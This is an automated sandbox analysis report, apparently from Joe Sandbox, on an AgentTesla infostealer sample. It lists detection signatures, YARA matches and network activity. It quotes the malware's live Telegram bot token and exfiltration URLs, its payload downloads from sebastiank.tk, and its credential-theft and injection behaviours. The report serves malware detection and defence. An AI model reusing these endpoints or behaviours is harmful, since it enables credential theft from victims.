Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.27473

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.27473 (renamed file extension from 27473 to exe)
Analysis ID:680350
MD5:36c6dddaa5fb7f14e221c8fa3bda0d92
SHA1:11914d1b9eceea7365aa1195777193e8b7686bc9
SHA256:fbeb5eff4ac0eaeeba51f60586ef6279f4c483c14803f293dbc513c8a032f60e
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Detected potential unwanted application
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe (PID: 2280 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe" MD5: 36C6DDDAA5FB7F14E221C8FA3BDA0D92)
    • cvtres.exe (PID: 5216 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "5041089746", "Chat URL": "https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocument"}
SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
        • 0x31109:$a3: MailAccountConfiguration
        • 0x31122:$a5: SmtpAccountConfiguration
        • 0x310e9:$a8: set_BindingAccountConfiguration
        • 0x30057:$a11: get_securityProfile
        • 0x2fef8:$a12: get_useSeparateFolderTree
        • 0x3184c:$a13: get_DnsResolver
        • 0x30307:$a14: get_archivingScope
        • 0x3012f:$a15: get_providerName
        • 0x32837:$a17: get_priority
        • 0x31e0b:$a18: get_advancedParameters
        • 0x31223:$a19: get_disabledByRestriction
        • 0x2fcce:$a20: get_LastAccessed
        • 0x303a1:$a21: get_avatarType
        • 0x31f22:$a22: get_signaturePresets
        • 0x309c8:$a23: get_enableLog
        • 0x301ac:$a26: set_accountName
        • 0x3236d:$a27: set_InternalServerPort
        • 0x2f63d:$a28: set_bindingConfigurationUID
        • 0x31ee8:$a29: set_IdnAddress
        • 0x326eb:$a30: set_GuidMasterKey
        • 0x30207:$a31: set_username
        00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_f2a90d14unknownunknown
        • 0x3dd4:$a: 0B FE 01 2C 0B 07 16 7E 08 00 00 04 A2 1F 0C 0C 00 08 1F 09 FE 01
        00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 30 entries
          SourceRuleDescriptionAuthorStrings
          3.0.cvtres.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            3.0.cvtres.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              3.0.cvtres.exe.400000.4.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                3.0.cvtres.exe.400000.4.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x30dc4:$s1: get_kbok
                • 0x316f8:$s2: get_CHoo
                • 0x32353:$s3: set_passwordIsSet
                • 0x30bc8:$s4: get_enableLog
                • 0x35319:$s8: torbrowser
                • 0x33cf5:$s10: logins
                • 0x335c3:$s11: credential
                • 0x2ffbc:$g1: get_Clipboard
                • 0x2ffca:$g2: get_Keyboard
                • 0x2ffd7:$g3: get_Password
                • 0x315a6:$g4: get_CtrlKeyDown
                • 0x315b6:$g5: get_ShiftKeyDown
                • 0x315c7:$g6: get_AltKeyDown
                3.0.cvtres.exe.400000.4.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
                • 0x31309:$a3: MailAccountConfiguration
                • 0x31322:$a5: SmtpAccountConfiguration
                • 0x312e9:$a8: set_BindingAccountConfiguration
                • 0x30257:$a11: get_securityProfile
                • 0x300f8:$a12: get_useSeparateFolderTree
                • 0x31a4c:$a13: get_DnsResolver
                • 0x30507:$a14: get_archivingScope
                • 0x3032f:$a15: get_providerName
                • 0x32a37:$a17: get_priority
                • 0x3200b:$a18: get_advancedParameters
                • 0x31423:$a19: get_disabledByRestriction
                • 0x2fece:$a20: get_LastAccessed
                • 0x305a1:$a21: get_avatarType
                • 0x32122:$a22: get_signaturePresets
                • 0x30bc8:$a23: get_enableLog
                • 0x303ac:$a26: set_accountName
                • 0x3256d:$a27: set_InternalServerPort
                • 0x2f83d:$a28: set_bindingConfigurationUID
                • 0x320e8:$a29: set_IdnAddress
                • 0x328eb:$a30: set_GuidMasterKey
                • 0x30407:$a31: set_username
                Click to see the 42 entries
                No Sigma rule has matched
                Timestamp:192.168.2.48.8.8.854800532012811 08/08/22-12:54:11.254271
                SID:2012811
                Source Port:54800
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeJoe Sandbox ML: detected
                Source: 3.0.cvtres.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                Source: 3.0.cvtres.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                Source: 3.2.cvtres.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 3.0.cvtres.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                Source: 3.0.cvtres.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 3.0.cvtres.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                Source: 3.0.cvtres.exe.400000.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5041089746", "Chat URL": "https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocument"}
                Source: cvtres.exe.5216.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendMessage"}
                Source: unknownHTTPS traffic detected: 162.240.35.239:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49855 version: TLS 1.2
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\WHGDFHKDLHDJD.pdb source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.246693047.0000000007DD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245345627.000000000271A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\WHGDFHKDLHDJD.pdbBSJB source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.246693047.0000000007DD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245345627.000000000271A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: QIYUIEHDKHDFKDF.pdb source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: Binary string: QIYUIEHDKHDFKDF.pdb$ source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe

                Networking

                barindex
                Source: TrafficSnort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.2.4:54800 -> 8.8.8.8:53
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, type: SAMPLE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: GET /devv/POPO.txt HTTP/1.1Host: sebastiank.tkConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /devv/DLLL.txt HTTP/1.1Host: sebastiank.tk
                Source: global trafficHTTP traffic detected: POST /bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da79575956deb2Host: api.telegram.orgContent-Length: 1001Expect: 100-continueConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                Source: cvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: cvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: cvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://UEYOBD.com
                Source: cvtres.exe, 00000003.00000002.503890363.0000000006D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.244709558.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.506666547.0000000009CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://ocsp.digicert.com0I
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://ocsp.digicert.com0O
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://ocsp.digicert.com0P
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://ocsp.digicert.com0R
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.503821674.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245047543.0000000002610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sebastiank.tk
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: cvtres.exe, 00000003.00000002.503667667.0000000006CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://FU6DgqPJnyDGd.net
                Source: cvtres.exe, 00000003.00000002.503821674.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/
                Source: cvtres.exe, 00000003.00000002.503821674.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocument
                Source: cvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocumentdocument-----
                Source: cvtres.exe, 00000003.00000002.503821674.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sebastiank.tk
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245081518.0000000002630000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245008356.00000000025E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sebastiank.tk/devv/DLLL.txt
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245008356.00000000025E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sebastiank.tk/devv/POPO.txt
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sebastiank.tk4
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245081518.0000000002630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sebastiank.tkD8
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeString found in binary or memory: https://www.digicert.com/CPS0
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: cvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                Source: unknownHTTP traffic detected: POST /bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da79575956deb2Host: api.telegram.orgContent-Length: 1001Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: sebastiank.tk
                Source: global trafficHTTP traffic detected: GET /devv/POPO.txt HTTP/1.1Host: sebastiank.tkConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /devv/DLLL.txt HTTP/1.1Host: sebastiank.tk
                Source: unknownHTTPS traffic detected: 162.240.35.239:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49855 version: TLS 1.2
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.244435933.000000000082B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_f2a90d14 Author: unknown
                Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe PID: 2280, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exePE Siganture Subject Chain: CN=Wen Jia Liu, O=Wen Jia Liu, L=Sydney, S=New South Wales, C=AU
                Source: 3.0.cvtres.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bEEE02A64u002dA051u002d4832u002d8500u002dBCB6E03153A3u007d/u003277DE882u002dD82Fu002d4CFAu002d82FDu002d8DA69792B4E8.csLarge array initialization: .cctor: array initializer size 12005
                Source: 3.0.cvtres.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bEEE02A64u002dA051u002d4832u002d8500u002dBCB6E03153A3u007d/u003277DE882u002dD82Fu002d4CFAu002d82FDu002d8DA69792B4E8.csLarge array initialization: .cctor: array initializer size 12005
